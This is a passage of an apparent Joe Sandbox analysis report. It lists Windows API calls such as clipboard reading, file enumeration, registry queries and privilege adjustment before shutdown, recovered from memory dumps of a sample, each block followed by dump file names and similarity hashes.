                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B41658
                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B4166A
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B41691
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B41698
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B416A1
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B416A8
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B416B1
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B416B8
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B416C4
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B416CB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: GetProcessHeap.KERNEL32(00000008,00B414FD,?,00000000,?,00B414FD,?), ref: 00B41AED
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B414FD,?), ref: 00B41AF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B414FD,?), ref: 00B41B03
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7ba670d4e65bb924e89b687258bd147d8b49dddc2c1bedcd1cd57a6420861c6a
                                                                                                                                                                                                                                                                                    • Instruction ID: 3ddddd708d3b6047f5030db1a88b6ce8c5891303e67d89859d562d931d6d32b8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba670d4e65bb924e89b687258bd147d8b49dddc2c1bedcd1cd57a6420861c6a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28714CB2D00209ABDF109FA9DC44FEEBBB8FF04350F194955E919A7190DB31DA85DBA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00B7DCD0), ref: 00B5F586
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B5F594
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00B5F5A0
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00B5F5AC
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B5F5E4
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00B5F5EE
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B5F619
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00B5F626
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00B5F62E
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B5F63F
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B5F67F
                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B5F695
                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00B5F6A1
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B5F6B2
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B5F6D4
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B5F6F1
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B5F72F
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B5F750
                                                                                                                                                                                                                                                                                    • CountClipboardFormats.USER32 ref: 00B5F771
                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00B5F7B6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c0a1ef4ba9ddfa1af3e2bcaa8d5811b659fc853f8bba3f4a83d604d660246f3a
                                                                                                                                                                                                                                                                                    • Instruction ID: f6f06838bbe4375ee225504d08a18c6b6a99b14d7c2072751796de03dc46dedc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0a1ef4ba9ddfa1af3e2bcaa8d5811b659fc853f8bba3f4a83d604d660246f3a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C618D312042429FD300EF20D888F6AB7F4EF98785F1445A9F94A872A2DF71ED49DB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B57403
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B57457
                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B57493
                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B574BA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B574F7
                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B57524
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                    • Opcode ID: d6ed08b74dd5ffab8062550883184a3782b2de181fa91ee393930fb83fe6c0c3
                                                                                                                                                                                                                                                                                    • Instruction ID: e6dfafce92e510a9107cb915b609938a3df1614b0bd3ce4029e6002a8eb5c95f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6ed08b74dd5ffab8062550883184a3782b2de181fa91ee393930fb83fe6c0c3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFD15E72508344AEC300EB65C985EBBB7ECEF98704F400959F589D7252EB74DA48C762
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B5A0A8
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B5A0E6
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00B5A100
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B5A118
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A123
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00B5A13F
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B5A18F
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00BA7B94), ref: 00B5A1AD
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B5A1B7
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A1C4
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A1D4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                    • Opcode ID: 4afc64666100ba3d5df549e0df7a1314afa1b245186ac3654c64200f7f9db063
                                                                                                                                                                                                                                                                                    • Instruction ID: 0a7c4cc73d5139704d15063fe571e39858b3bdf5f002f611f4abeda38412eecb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4afc64666100ba3d5df549e0df7a1314afa1b245186ac3654c64200f7f9db063
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E31E2326046096BDB20AFB4DC49BDE77ECDF06361F0006D5EC18F30A0EB70DA898A65
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B54785
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B547B2
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B547E2
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B54803
                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00B54813
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B5489A
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B548A5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B548B0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                    • Opcode ID: 827c2cc99f6315855d0fb60b6345a8144ba2f38455d069a9878d7ed39c00eb47
                                                                                                                                                                                                                                                                                    • Instruction ID: 778401cbc9e73ac99e6b239ee7ed91f8aa7e6981f477a3322ec6edf58860addb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 827c2cc99f6315855d0fb60b6345a8144ba2f38455d069a9878d7ed39c00eb47
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0319271504249ABDB219FA0DC49FEB37FCEF89745F1041F6FA09D60A1EB7096888B24
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B5A203
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B5A25E
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A269
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00B5A285
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B5A2D5
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00BA7B94), ref: 00B5A2F3
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B5A2FD
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A30A
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B5A31A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B4E3B4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                    • Opcode ID: c1266d41ff984ce5853e23367e35a551927962540da7e0836c6fa4f42f51dc0c
                                                                                                                                                                                                                                                                                    • Instruction ID: d44bf25ded100cc0d72597c54579ea0830fc7f93f79770da0c931a209ac69a9f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1266d41ff984ce5853e23367e35a551927962540da7e0836c6fa4f42f51dc0c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1231F2725042196EDB20AFA4DC4ABDE7BFCEF45365F1042D5EC14B30A0DB32DE898A65
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C99E
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00B6CA09
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6CA2D
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6CA8C
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B6CB47
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B6CBB4
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B6CC49
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00B6CC9A
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00B6CD43
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B6CDE2
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6CDEF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b216dec3635e7825968ec79fe57b98f7656e0b33e5944a941108a67efe63d7de
                                                                                                                                                                                                                                                                                    • Instruction ID: eed81006b88c0a2f06eab2cb9a199e68fbd7af21f626b42a4fcdc0cee41952b7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b216dec3635e7825968ec79fe57b98f7656e0b33e5944a941108a67efe63d7de
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 810250716042409FC715DF24C995E3ABBE5EF48314F1884ADF88ACB2A2DB35ED42CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4EAB0: GetFileAttributesW.KERNEL32(?,00B4D840), ref: 00B4EAB1
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B4D9CD
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B4DA88
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B4DA9B
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B4DAB8
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B4DAE2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B4DAC7,?,?), ref: 00B4DB5D
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00B4DAFE
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B4DB0F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                    • Opcode ID: 50a07225467cc852ef1f38cd37d470f34f9ea742caae2bfc9c8a8bb14974ccec
                                                                                                                                                                                                                                                                                    • Instruction ID: 9cecbbdfbe0ff6d8b594e52083835c5f16ed04dcb32b3c2974623382e1a56fb4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50a07225467cc852ef1f38cd37d470f34f9ea742caae2bfc9c8a8bb14974ccec
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB615B3180514DAECF05EBA1DE969EEB7B5EF14300F2045A9E406B7192EF71AF09DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3de1eb1ff710082fcfa54dac22521aa78331c498c62bfc75eaef39e19e14a54a
                                                                                                                                                                                                                                                                                    • Instruction ID: 683273cc19330bbc046d793db8a516c830b6f4cbd7e525c0ce17ce12e17855b4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de1eb1ff710082fcfa54dac22521aa78331c498c62bfc75eaef39e19e14a54a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20417931604652EFE710DF15D888B25BBE4FF44359F14C4E9E8198B6A2CB35ED86CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B4205A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B42087
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42010: GetLastError.KERNEL32 ref: 00B42097
                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00B4F249
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
